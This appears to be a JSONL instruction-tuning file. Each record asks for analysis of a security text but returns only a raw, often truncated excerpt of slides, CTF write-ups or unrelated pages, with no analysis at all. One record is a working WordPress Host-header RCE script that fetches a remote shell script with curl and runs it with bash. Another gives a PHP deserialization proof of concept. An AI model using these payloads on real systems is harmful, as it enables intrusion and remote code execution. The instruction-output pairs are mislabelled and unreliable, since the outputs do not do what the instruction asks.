{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHijacking Arbitrary .NET Application Control Flow Topher Timzen Security Researcher, Intel Security Trainer TopherTimzen.com @TTimzen #whoami Overview .NET? Runtime Attacks Modify Control Flow Machine Code Editing Managed Heap Tools Released Use .NET to attack Using Objects on the Heap Why are we Here? CLR Attacks Controlling the Common Language Runtime Accessing raw objects on Managed Heap Manipulate AppDomains  Controlling all Loaded Code  Controlling Just-In-Time Compilation Attack With ASM Manipulate Resources Attack methods at ASM level Alter application control flow Runtime .NET Process CLR (2.0/4.0) & AppDomains Assemblies (.EXE and .DLL(s)) Objects Properties Fields Instance Methods Classes Methods Logic Gray Frost & Gray Storm The Tools Gray Frost Gray Frost Payload delivery system C++ .NET CLR Bootstrapper Creates or injects 4.0 runtime Capability to pivot into 2.0 runtime Contains raw payload 2 Rounds GrayFrostCpp GrayFrostCSharp  C# Payload Round 1 .NET Process Round 1 Mscoree GrayFrostCpp Round 1 GrayFrostCpp Round 1 GrayFrostCSharp GrayFrostCpp Round 2 .NET Process Round 2 .NET Process GrayFrostCSharp Round 2 .NET Process payload void main() GrayFrostCSharp Round 2 .NET Process Payload .NET Process Pivoting Between runtimes Mscoree GrayFrostCpp Pivoting Between runtimes GrayFrostCpp Pivoting Between runtimes GrayFrostCSharp GrayFrostCpp Pivoting Between runtimes GrayFrostCSharp GrayFrostCpp Pivoting Between runtimes GrayFrostCpp Pivoting Between runtimes GrayFrostCSharp GrayFrostCpp Pivoting Between runtimes GrayFrostCSharp GrayFrostCpp Pivoting Between runtimes Gray Storm Gray Storm Reconnaissance and In-memory attack payload Features Attacking the .NET JIT Attacking .NET at the ASM level ASM and Metasploit payloads Utilize objects on the Managed Heap Gray Storm Usage Controlling the JIT Method Tables contain address of JIT stub for a classs methods. During JIT the Method Table is referenced We can control the address Lives after Garbage Collection Co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Hashcash - Pwn (150 + 0), 13 solves > Shall we play a game? We need help beta testing our fancy new cryptocurrency themed lottery game. There may just be a bounty in it for you if you can pwn it. In this task we were given a binary and `host:port` of the server. We actually solved the task withouth the binary, in a blackbox, probably unintended, way. Basic communication with the server was that it was sending us one byte nonce and difficulty level, then we have to send input such that `md5(nonce | input)` starts with n leading zero bytes. The difficulty rises with level, from just one byte needed, all the way up to 8, thus requiring `264` md5 evaluations. This is much too much, so we had to find another way. A quick googling on the subject showed us this website: http://0xf.kr/md5/. It keeps track of the smallest md5 outputs ever generated, and it looks like the record has exactly 8 zeros at the start. If there was no nonce specified, we would be able to use that preimage. But since the nonce is just one byte, we can just wait for the server to generate one that is the first byte of our found input. Then we just send the rest, and we're done.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCan Homegrown Information Analysis Tools Help Us Make Better Predictions about the Outcome of Supreme Court Cases? Foofus Table of Contents Introduction..........................................................................................................................................1 Gathering Argument Data via the Web.................................................................................................2 Technical Background.....................................................................................................................2 Interacting with the Oyez Web Server.............................................................................................4 Limitations.......................................................................................................................................5 The Justices..........................................................................................................................................7 Anthony Kennedy............................................................................................................................8 Scorecard.....................................................................................................................................8 Discussion...................................................................................................................................8 Antonin Scalia................................................................................................................................10 Scorecard...................................................................................................................................10 Discussion ................................................................................................................................10 Clarence Thomas...........................................................................................................................12 Score", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n脚本觉悟之获取正确编码 0x00 认识text与content 先来段熟悉的代码: 那么 text 与 content 的区别我们可以跟进看看 content 代表返回 raw 类型的byte字节流数据这个时候的数据没有编码概念 text 通过阅读注释和代码可知返回的是编码后数据其中获取编码的流程是先通过 response 的header头来 判断如果没有则Fallback到 chardet 去猜测然后使获取到的最终编码类型对byte数据进编码 resp = requests.get(url=url, verify=False) print(resp.text) print(resp.content) 0x01 出现问题 乍看是不是以后我们使 text 就能获取到较为准确的编码后的内容了 爽歪歪 但是当你尝试执下这段代码的时候乱码却来的那么令惊喜\" import requests import chardet def get(url): try: resp = requests.get(url=url, verify=False) print(resp.encoding) print(resp.headers) print(resp.text) except Exception as e: print(e) get(\"https://baidu.com/\") 先 requests 从header获取到编码是 ISO-8859-1 单字节根据乱码来看嗯出错了 在 adapters.py 的274 get_encoding_from_headers 可以看到获取到的编码逻辑 requests 作者基于些考量做了些\"优化\" 0x02 解决问题 编码的选择权交给提供是种\"合理\"的约定但是很多站在控制编码是通过在html通过 <meta chartset=\"utf-8\"> 之类的语句来指定的编码导致爬使 requests.text 就会得到乱码的结果针对 这种情况与其被动不如主动直接利 chardet 进\"经验\"考量判断 if 'text' in content_type: return 'ISO-8859-1' import requests import chardet 0x03 总结 炒冷饭的些常识性的东对于优化你的常扫描脚本或许能起到些作吧少在速度准确度上以 及脚本轻量化这都是种不错的选择 import urllib3 urllib3.disable_warnings() def get(url): try: resp = requests.get(url=url, verify=False) encoding = chardet.detect(resp.content).get(\"encoding\", \"utf-8\") return str(resp.content, encoding=encoding) except requests.exceptions as e: print(e) print(get(\"https://baidu.com/\"))", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n---------------- [Forensics] Dump - 50 points ---------------- > English: > We know this dump was generated by a process which was executing as root in the computer, and that it was reading directly from a /dev device. Probably it is part of a keylogger module included in a rootkit which is being tested by the Club. Help us to unveil this message, allowing us to discover why they infected this specific machine. > Submit the flag in the format: CTF-BR{message} In this task we were given a `dump` file. Looking at it in hexeditor, we quickly notice that it almost repeats every 24 bytes: ``` $ hexdump -C dump | head 00000000 79 8e 8a 56 00 00 00 00 d0 59 0a 00 00 00 00 00 |y..V.....Y......| 00000010 04 00 04 00 28 00 07 00 79 8e 8a 56 00 00 00 00 |....(...y..V....| 00000020 d0 59 0a 00 00 00 00 00 01 00 1c 00 00 00 00 00 |.Y..............| 00000030 79 8e 8a 56 00 00 00 00 d0 59 0a 00 00 00 00 00 |y..V.....Y......| 00000040 00 00 00 00 00 00 00 00 7b 8e 8a 56 00 00 00 00 |........{..V....| 00000050 7f b7 0a 00 00 00 00 00 04 00 04 00 e1 00 07 00 |................| 00000060 7b 8e 8a 56 00 00 00 00 7f b7 0a 00 00 00 00 00 |{..V............| 00000070 01 00 2a 00 01 00 00 00 7b 8e 8a 56 00 00 00 00 |..*.....{..V....| 00000080 7f b7 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000090 7b 8e 8a 56 00 00 00 00 82 2e 0c 00 00 00 00 00 |{..V............| ``` In the task description `/dev` was mentioned. Googling Linux's treatment of keyboard we notice the following structure: ``` struct input_event { struct timeval time; unsigned short type; unsigned short code; unsigned int value; }; ``` It seems to fit our data - timeval was monotonically increasing, and the size of the structure was 24. We found that `value` contains 0 or 1, depending on whether the key was pressed or released, the `type` that was interesting for us was `EV_KEY` (1), and `code` was the keycode. In `keys.h` file from Linux source code there were all keycode definitions. We copied interesting pa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nshawn.webb@hardenedbsd.org Twitter: @lattera HardenedBSD Internals Agenda  About Me  De<nitions  About HardenedBSD  Features  Weather Report  Digging In About Me  Cofounder of HardenedBSD  Security enthusiast  Opensource advocate  Evangelist of FreeBSD  ZFS fanboy De<nitions Security De<nitions Exploit Mitigation De<nitions Address Space Layout Randomization (ASLR) About HardenedBSD About HardenedBSD  O/cially launched April 2014  Implementing and upstreaming ASLR is hard  Single repository for FreeBSD exploitation mitigation development  Full fork of FreeBSD About HardenedBSD  Many contributors  Four developers. Two active daily.  Incoming contributions from universities  Four dedicated servers. One fully funded via IndieGogo.  Potentially even more servers on their way About HardenedBSD  Three-year game plan:  ASLR, mprotect(exec) restrictions, wx upstreamed  UDEREF  [lin]procfs restrictions upstreamed  O/cial releases  Commercial support About HardenedBSD  Five-year game plan:  501(c)3 non-pro<t organization  And for-pro<t arm  O/cial hardware appliances (<rewalls, IDS/IPS, etc.)  Windows SBS-like tool Features  ASLR  NoExec  AKA wx, AKA PaX PAGEEXEC  [lin]procfs protections (lolwut? Yeah, really)  PTrace restrictions  mmap(map_32bit) hardening Features  Complete removal of mmap(NULL, MAP_FIXED) support  Removal of many image activators  getentropy  Boot hardening Features  PaX-inspired SEGVGUARD  Intel Supervisor Mode Access Protection (SMAP)  The secadm application Weather Report  ASLR  Version 0  Being upstreamed  Version 0.5  Shared object load order randomization  Will upstream after v0 is accepted Weather Report  ASLR  Version 1  Research phase  VDSO randomization  True stack randomization  PS_STRINGS  Breaks a whole ton of ABI/API Weather Report  NoExec  AKA wx, AKA PaX PAGEEXEC  Inspired by PaX  Prevent pages from being both writable and executable  Problem: Dynamic code (IE, Java, Javascript, JIT engines)  More research being done Weather Report  [lin]pr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前言 本篇文章由 Yii 2.0.35 反序列化漏洞复现到新利用链发现 中发现的新利用连的坑展开的测试. 结果在最后 面 我在文章中提到 poc 加上 phpinfo 才能执行成功. 我当时的猜测是因为 phpinfo 函数执行的回显内容 过大出发了分段传输导致的. 然后我就展开了测试, 测试环境: phpstudy, PHP 7.0.9 利用链调整 文章发出后才发现, 调试时发现利用链中的第二节: \\vendor\\guzzlehttp\\psr7\\src\\FnStream.php 中 的 __destruct() (对象销毁时)魔术方法就存在危险函数且参数可控, 所以使用这条利用链不需要经过 \\vendor\\yiisoft\\yii2\\db\\BatchQueryResult.php 测试是否与分块传输有关 像上篇文章一样执行放大危害的操作此时执行报错了. 由于报错回显的信息也非常大所以依然是分块 传输, 因此执行结果不受分块传输的影响, // 控制 $this->_fn_close 为 phpinfo public function __destruct() { if (isset($this->_fn_close)) { call_user_func($this->_fn_close); } } // 执行成功后, 同时也会触发 FnStream 的 __wakeup (反序列化时)魔术方法 public function __wakeup() { throw new \\LogicException('FnStream should never be unserialized'); } 但如果回显内容过少也会影响到执行. 以 whoami 为例. 我以为只是没有回显. 所以我尝试了 shutdown - t 0 /s 并没有执行. ipconfig /all 正常回显. 所以与回显内容长度有关. 单单根据回显顺的情况程序的执行顺序像是先执行 __destruct() 然后再执行 __wakeup() 的 测试是否受PHP版本影响 调整 PHP 版本为 7.1.9 , 使用以下 poc , 进行测试 执行失败了!!!!. namespace GuzzleHttp\\Psr7 { class FnStream { var $_fn_close; function __construct() { $this->_fn_close = \"phpinfo\"; } } $b = new FnStream(); echo(urlencode(serialize($b))); } 于是我打开了 debug 进行测试. 调试低版本至 7.0.9 的时候我惊奇的发现. 顺序是先到 __wakeup() 执 行 throw new Exception() 之后 居然正常执行了 __destruct() ! 当我将PHP版本调整至 7.1.9 就不行了也就是说PHP 版本 <= 7.0.9 时. throw new Exception() 后 __destruct() 还会继续正常执行而不是直接终止程序 那如果我用 PHP 7.0.9 跑已修复的版 本(2.0.38)是否能成功呢? 2.0.38 反序列化漏洞 根据 github 上给出的修复 CVE-2020-15148 漏洞信息. Yii 2.0.38(包括)之后. 修复了该问题 Yii 2.0.38 basic-app 下测试 下载 basic-app 打开页面后 提示需要配置 cookieValidationKey 配置 CookieValidation 之后, 复制 TestController.php 过来 可以看到修复代码 使用同样的 payload成功 绕过 __wakeup 绕过 __wakeup() 也有版本需求, 经过我的一番测试用绕过 _wakeup的方法, 得出的总结是: 可以但没必 要, 来做一个实验. 当前PHP版本 7.0.9 可以看到直接结果中. 正常执行了 __destruct() , 但是unserialize反序列化的结 果是 false. 打开 xdebug, 查看程序的执行顺序. 确实没有经过 _wakeup. 而是直接进入了 __destruct() , console 中记录了两次报错. 一次是反序列化时, 一次是反序列化结束后 class FnStream { var $_fn_close = \"\"; public function __destruct() { if (isset($this->_fn_close)) { eval($this->_fn_close); } } public function __wakeup() { throw new", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python3 import requests import sys # wordpress's url target = 'http://127.0.0.1' if len(sys.argv) < 1 else sys.argv[1] # Put your command in a website, and use the website's url # don't contains \"http://\", must be all lowercase shell_url = 'example.com/1.txt' if len(sys.argv) < 2 else sys.argv[2] # an exists user user = 'admin' def generate_command(command): command = '${run{%s}}' % command command = command.replace('/', '${substr{0}{1}{$spool_directory}}') command = command.replace(' ', '${substr{10}{1}{$tod_log}}') return 'target(any -froot@localhost -be %s null)' % command session = requests.session() data = { 'user_login': user, 'redirect_to': '', 'wp-submit': 'Get New Password' } session.headers = { 'Host': generate_command('/usr/bin/curl -o/tmp/rce ' + shell_url), 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' } session.allow_redirects = False target += '/wp-login.php?action=lostpassword' session.post(target, data=data) session.headers['Host'] = generate_command('/bin/bash /tmp/rce') session.post(target, data=data)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCovert Post-Exploitation Forensics With Metasploit Tools and Examples R. Wesley McGrew wesley@mcgrewsecurity.com http://mcgrewsecurity.com Mississippi State University National Forensics Training Center http://msu-nftc.org Introduction In digital forensics, most examinations take place after the hardware has been physically seized (in most law enforcement scenarios) or a preinstalled agent allows access (in the case of enterprise forensics packages). There are existing tools that allow for forensic examination of storage media, that allow for the recovery of data from (but not limited to) deleted files, unallocated space, and the slack space between the ends of files and the next sector/cluster boundaries. The above scenarios imply that the subject (the one in possession of the media) is aware of the fact that their data has been seized or subject to remote access. There are situations where this may not be desirable for an examiner:  Penetration testing  Evidence seizure when physical location is unknown  Surreptitious monitoring While existing tools (such as those in the Metasploit framework) allow attackers to navigate and selectively download portions of the targets filesystem without the subjects knowledge, this does not compare to the feature set of a true file-system forensic examination. It would be a boon for a penetration tester to have the ability to find data that had previously been deleted by the subject for compliance. It would be useful for intelligence gathering to be able to data carve for old versions of documents or emails. In this paper, and the accompanying talk, three new Meterpreter scripts will be introduced that will allow for existing digital forensic tools to be used in a more cover context. These tools allow for remote imaging of subject filesystems and disks, as well as mapping remote filesystems to local block devices. Examples are given on how to use these tools to combine the capabilities of the Metasploit framework to those of moder", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage org.vulhub.shirodemo; import org.apache.shiro.SecurityUtils; import org.apache.shiro.authc.AuthenticationException; import org.apache.shiro.authc.UsernamePasswordToken; import org.apache.shiro.subject.Subject; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.*; @Controller public class UserController { @PostMapping(\"/doLogin\") public String doLoginPage(@RequestParam(\"username\") String username, @RequestParam(\"password\") String password, @RequestParam(name=\"rememberme\", defaultValue = \"\") String rememberMe) { Subject subject = SecurityUtils.getSubject(); try { subject.login(new UsernamePasswordToken(username, password, rememberMe.equals(\"remember-me\"))); } catch (AuthenticationException e) { return \"forward:/login\"; } return \"forward:/\"; } @RequestMapping(\"/admin\") public String helloPage() { return \"admin\"; } @RequestMapping(\"/unauth\") public String errorPage() { return \"error\"; } @RequestMapping(\"/login\") public String loginPage() { return \"login\"; } @GetMapping(\"/\") public String index() { return \"login\"; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nChip & PIN is definitely broken Credit Card skimming and PIN harvesting in an EMV world Andrea Barisani <andrea@inversepath.com> Daniele Bianco <daniele@inversepath.com> Chip & PIN is definitely broken  v1.3 Copyright 2011 Inverse Path S.r.l. Adam Laurie <adam@aperturelabs.com> Zac Franken <zac@aperturelabs.com> What is EMV? EMV stands for Europay, MasterCard and VISA, the global standard for inter-operation of integrated circuit cards (IC cards or \"chip cards\") and IC card capable point of sale (POS) terminals and automated teller machines (ATMs), for authenticating credit and debit card transactions. IC card systems based on EMV are being phased in across the world, under names such as \"IC Credit\" and \"Chip and PIN\". Source: Wikipedia Copyright 2011 Inverse Path S.r.l. Chip & PIN is definitely broken  v1.3 Why EMV?  ICC / smartcard  improved security over existing magnetic stripe technology  offline card verification and transaction approval  multiple applications on one card Copyright 2011 Inverse Path S.r.l. Chip & PIN is definitely broken  v1.3 Liability shift  liability shifts away from the merchant to the bank in most cases (though if merchant does not roll EMV then liability explicitly shifts to it)  however the cardholder is assumed to be liable unless they can unquestionably prove they were not present for the transaction, did not authorize the transaction, and did not inadvertently assist the transaction through PIN disclosure  PIN verification, with the help of EMV, increasingly becomes proof of cardholder presence Copyright 2011 Inverse Path S.r.l. Chip & PIN is definitely broken  v1.3 Liability shift  VISA Zero Liability fine print (US): Does not apply to ATM transactions, PIN transactions not processed by Visa, or certain commercial card transactions. Individual provisional credit amounts are provided on a provisional basis and may be withheld, delayed, limited, or rescinded by your issuer based on factors such as gross negligence or fraud, delay in r", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting JRE - JRE Vulnerability: Analysis & Hunting @Hitcon 2013 xye0x01@gmail.com nforest@live.cn About Us  Xiao Lee(xye0x01),Sen Nie(nforest)  SHANGHAI JIAO TONG UNIVERSITY  Major in Computer Science and Technology  J2EE Development/Program Analysis/ JRE Vulnerability Research/XSS Abstract Exploiting Applet JRE Security Components JRE Vulnerability Hunting bugs in JRE Whats next Exploiting Applet  JDK/JRE/JVM  Java Applet  <applet code=exploit.class>  No DEP & ASLR Under JRE 6  Objective: Oracle JRE/Apple JRE/ OpenJDK in Windows/Linux/Mac OS X Exploiting Applet 5% 10% 16% 32% 37% JRE Adobe Reader/Acrobat Adobe Flash MS IE Others Data from Java als Sicherheitsrisiko by Renato Ettisberger in 2011. JRE Security Components Comic from Security Issues of the Sandbox inside Java Virtual Machine (JVM) by Mohammad Shouaib Hashemi in 2010. Sandbox Restriction  Read/Write local files  Commands  Socket  Get system properties  Load libraries  ... JRE Security Components  Classloader  SecurityManager  doPrivileged block  Reflection  Package Access ClassLoader BootStrap Classloader Custom Classloader Extension Classloader Application Classloader Java C Java Java Trust all the classes it loaded Security checks Security checks Security checks SecurityManager  Key component of security checks  null in local Java Applications  sun.applet.AppletSecurity in Applets by default  System.setSecurityManager(null)  Find a way setting SecurityManager to null doPrivileged block AccessController. checkPermission() ... ... ... ... ... dangerous() ... AccessController. checkPermission() ... ... doPrivileged() ... ... dangerous() ... Function Stack Function Stack check check stop stop Exception Reflection  Get Class/Method/Constructor/Field object of a class  Field: get/set  Constructor: newInstance  Method: invoke  Java 7: MethodType & MethodHandle Package Access  Warnings in IDE like Eclipse  checkPackageAccess before execute  Security.getProperty(package.acce ss)  Simple but effective JRE V", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Picture is Worth a Thousand Words, Literally Deep Neural Networks for Social Stego Philip Tully | Mike Raggo 1 DC25: Community, Discovery and the Unintended Uses of Technology 2 2600: The Hacker Quarterly 3 Summer 1992 Summer 2017 25 years #whoami 4 Philip Tully @phtully Principal Data Scientist at ZeroFOX PhD (KTH & University of Edinburgh) Machine Learning and Neural Nets Mike Raggo @datahiding CSO @802 Secure, 17 yrs Stego Research StegSpy DC12, Author Data Hiding NSA National Cryptologic Museum A Picture is Worth A Thousand Words: Deep Neural Networks for Social Stego The Evolution of Steganography 5 DIY Social Steganography Deep Neural Networks for Social Stego Data-Driven Red and Blue Teaming Wrap Up A Picture is Worth A Thousand Words: Deep Neural Networks for Social Stego The Evolution of Steganography 6 Covert Communication 7 . . . any communication channel that can be exploited by a process to transfer information in a manner that violates the system's security policy. Source: U.S. Department of Defense. Trusted Computer System Evaluation The Orange Book. Publication DoD 5200.28-STD. Washington: GPO 1985 WetStone Labs Collected Steganography Programs Since January 1999 Includes versions 8 Tools are simple, designed to exploit sense weaknesses Many copycats are born, with some new features, greater focus on JPEG embedding Methods become more resilient to statistical attacks Multimedia begins to evolve into a viable method New versions emerge of existing Alg. Steganographic file systems begin to emerge VOIP, RTP and UDP techniques emerge along with decoys to complicate detection and recovery Evolution of Methods Evolution of Stego in the Internet Era 9 Stego Apps Decoy Techniques (OpenPuff) Stealth Alternate Data Streams (NT) Weaponized CnC - Operation Shady RAT (McAfee) Prootocols - VOIP, RTP, UDP => WiFi StegoStuffing, Bluetooth (Hosmer/Raggo - Wall of Sheep/Skytalks DC23 & 24) MP3 ID3 Metadata exploitation - Hosmer/Raggo Skytalks DC24 SmartWatch SWATtac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: ISO 639-1 Language Code date: 2022-01-11 17:21:54 tags: - code - i18n - language categories: - Other intro: | This is a list of the ISO language codes that conform to the ISO 639-1 standard, it provide reference for multi-language website. --- Getting Started {.cols-2} --------------- ### Introduction - The [ISO 639-1](https://en.wikipedia.org/wiki/ISO_639-1) is a standardized nomenclature used to classify languages - The ISO 639-1 codes cover the world's major languages - These codes are a useful international and formal shorthand for indicating languages - Two-letter codes - Used to multilingual websites, aka Internationalization (`i18n`) - [i18n](https://en.wikipedia.org/wiki/Internationalization_and_localization) language codes {.marker-round} ### Multi-format of 639-1 codes - [Markdown Table](https://tableconvert.com/html-to-markdown?data=https://quickref.me/iso-639-1#TableGenerator) - [Template](https://tableconvert.com/html-to-template?data=https://quickref.me/iso-639-1#TableGenerator) - [LaTeX Table](https://tableconvert.com/html-to-latex?data=https://quickref.me/iso-639-1#TableGenerator) - [CSV](https://tableconvert.com/html-to-csv?data=https://quickref.me/iso-639-1#TableGenerator) - [Excel](https://tableconvert.com/html-to-excel?data=https://quickref.me/iso-639-1#TableGenerator) - [JSON Array](https://tableconvert.com/html-to-json?data=https://quickref.me/iso-639-1#TableGenerator) - [HTML Table](https://tableconvert.com/html-to-html?data=https://quickref.me/iso-639-1#TableGenerator) - [Insert SQL](https://tableconvert.com/html-to-sql?data=https://quickref.me/iso-639-1#TableGenerator) - [YAML Sequence](https://tableconvert.com/html-to-yaml?data=https://quickref.me/iso-639-1#TableGenerator) - [XML](https://tableconvert.com/html-to-xml?data=https://quickref.me/iso-639-1#TableGenerator) - [ASCII](https://tableconvert.com/html-to-ascii?data=https://quickref.me/iso-639-1#TableGenerator) - [MediaWiki Table](https://tableconvert.com/html-to-mediawiki?da", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSeven Ways to Hang Yourself with Google Android Yekaterina Tsipenyuk O'Neil Principal Security Researcher Erika Chin Ph.D. Student at UC Berkeley  Founding Member of the Security Research Group at For@fy (now an HP Company)  Code audits, iden@fying insecure coding paFerns, and providing security content for For@fy's soHware security products  B.S. and M.S. in CS from UC San Diego  Thesis focused on mobile agent security 2  Ph.D. student in Computer Science at UC Berkeley (Security research group)  B.S. from University of Virginia  Research interest in improving mobile phone security  Recently presented at MobiSys 2011 on vulnerabili@es stemming from inter- applica@on communica@on in Android  Introduc@on to Google Android  Seven Ways to Hang Yourself  Results of Empirical Analysis  Conclusion 4 GOOGLE ANDROID Introduc)on to  Android architecture  Security model  Applica@on breakdown  Android manifest  Inter-component communica@on 6  Applica@ons  Applica@on framework (SDK)  Dalvik virtual machine  Customized bytecode (.dex files)  Na@ve libraries  Graphics, database management, browser, etc.  Accessed through Java interfaces  Linux kernel  Device drivers, memory management, etc. 7 Lower Higher  Applica@ons have unique UIDs  Run as separate processes on separate VMs  Typically cannot read each others data and code  Linux-style file permissions  Android permissions protect  Access to sensi@ve APIs  Access to content providers  Inter- and intra-applica@on communica@on 8  Applica@ons are divided into components  4 types of components  Ac@vi@es  Services  Broadcast Receivers  Content Providers Each applica@on contains a manifest 10 <manifest ...> <application> <activity android:name=.MyActivity>...</activity> <receiver android:name=.MyReceiver>...</receiver> </application> <uses-sdk android:minSdkVersion=8 /> <uses-feature android:name=android.hardware.CAMERA/> <uses-permission android:name=android.permission.INTERNET /> <uses-permission android:name=android.permission.CAMER", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLTE REDIRECTION Forcing Targeted LTE Cellphone into Unsafe Network Wanqiao Zhang Unicorn Team  Communication security researcher Haoqi Shan Unicorn Team  Hardware/Wireless security researcher Qihoo 360 Technology Co. Ltd. LTE and IMSI catcher myths  In Nov. 2015, BlackHat EU, Ravishankar Borgaonkar, and Altaf Shaik etc. introduced the LTE IMSI catcher and DoS attack. IMSI Catcher Once a cellphone goes through the fake network coverage area, its IMSI will be reported to the fake network. DoS Attack DoS message examples: ü You are an illegal cellphone! ü Here is NO network available. You could shut down your 4G/3G/2G modem. Redirection Attack Malicious LTE: Hello cellphone, come into my GSM network Demo Fake LTE Network Fake GSM Network USRPs Demo Video Risk  If forced into fake network  The cellphone will have no service (DoS).  The fake GSM network can make malicious call and SMS.  If forced into rogue network  All the traffic (voice and data) can be eavesdropped. A femtocell controlled by attacker LTE Basic Procedure  (Power on)  Cell search, MIB, SIB1, SIB2 and other SIBs  PRACH preamble  RACH response  RRC Connection Request  RRC Connection Setup  RRC Connection Setup Complete + NAS: Attach request + ESM: PDN connectivity request  RRC: DL info transfer + NAS: Authentication request  RRC: UL info transfer + NAS: Authentication response  RRC: DL info transfer + NAS: Security mode command  RRC: UL info transfer + NAS: Security mode completer   Unauthorized area Attack Space! Procedure of IMSI Catcher Firstly send a TAU reject, then cellphone will send Attach Request, with its IMSI! Procedure of DoS Attack Attach Reject message can bring reject cause. Some special causes result in NO service on cellphone. Procedure of Redirection Attack RRC Release message can bring the cell info which it can let cellphone re-direct to. How to Build Fake LTE Network  Computer + USRP How to Build Fake LTE Network  There are some popular open source LTE projects:  Open Air Interface by", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: intrace categories: Information Gathering tags: [information gathering,kali linux,intrace,evasion,recon] date: 2017-04-23 08:54:45 --- 0x00 介绍 ------- InTrace是一款类似于Traceroute的被动路由跟踪工具但它不同的是他不主动发送数据包而是通过监听当前主机和目标主机的数据包进行分析从而获取路由信息这样既可以进行网络侦查又可以绕过防火墙的限制避免被防火墙发现工具使用非常简单只要开启监听然后等待获取和目标主机的数据包然后就可以获取路由跟踪信息了使用的时候需要指定端口该端口号必须在TCP连接中使用到否则就无法捕获对应的数据包 <!--more--> [主页][1] | [仓库][2] - 作者Robert Swiecki - 证书GPLv3 0x01 功能 ------- ```plain root@kali:~# intrace InTrace, version 1.5 (C)2007-2011 Robert Swiecki <robert@swiecki.net> 2014/05/20 09:59:29.627368 <INFO> 用法: intrace <-h 主机> [-p <端口>] [-d <调试级别>] [-s <载荷大小>] [-6] ``` 0x02 示例 ------- 使用数据包大小为4字节-s 4指定端口80-p 80向目标主机-h www.example.com进行路由跟踪 ```plain root@kali:~# intrace -h www.example.com -p 80 -s 4 InTrace 1.5 -- R: 93.184.216.119/80 (80) L: 192.168.1.130/51654 Payload Size: 4 bytes, Seq: 0x0d6dbb02, Ack: 0x8605bff0 Status: Packets sent #8 # [src addr] [icmp src addr] [pkt type] 1. [192.168.1.1 ] [93.184.216.119 ] [ICMP_TIMXCEED] 2. [192.168.0.1 ] [93.184.216.119 ] [ICMP_TIMXCEED] 3. [ --- ] [ --- ] [NO REPLY] 4. [64.59.184.185 ] [93.184.216.119 ] [ICMP_TIMXCEED] 5. [66.163.70.25 ] [93.184.216.119 ] [ICMP_TIMXCEED] 6. [66.163.64.150 ] [93.184.216.119 ] [ICMP_TIMXCEED] 7. [66.163.75.117 ] [93.184.216.119 ] [ICMP_TIMXCEED] 8. [206.223.119.59 ] [93.184.216.119 ] [ICMP_TIMXCEED] ``` [1]: http://code.google.com/p/intrace/ [2]: http://git.kali.org/gitweb/?p=packages/intrace.git;a=summary", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroducing nmrcOS Inertia <inertia@nmrc.org> Scope Hackers System administrators Distro builders Overall goals for the project Stable, secure, trusted system Intended users Intended uses History of the Project Initial approach Analysis of problems Solution How nmrcOS changed to solve these problems Rationale for these choices Noted Features of nmrcOS Debian based OS (easy to install, supports most hardware) Kernel mods Customized apps Kernel Linux 2.2.25 Openwall kernel patch (overflow protection, etc) HAP Linux kernel patch (better chroot, extra logging, etc) Trusted path enforced in kernel Random IP Ids Modified Applications Customized Pine 4.56 Sendmail 8.12.9 Why we chose it, and why we rebuilt and used \"unstable Bastille Linux auto-loaded and ran by default Other Features Installs and boots up in a locked-down state Host and network based intrusion detection included Includes many security, encryption and privacy tools Demonstration of nmrcOS Live demo of the installation procedure Configuration of nmrcOS How to maintain/upgrade an nmrcOS system Developing for nmrcOS Creating a non-kernel package Creating a kernel package Distributing your package Creating your own distro based on nmrcOS Future of nmrcOS Plans for future revisions of the system Questions and Followup http://nmrcos.nmrc.org/ Inertia <inertia@nmrc.org>", "category": "text_analysis", "source": "security_papers"}
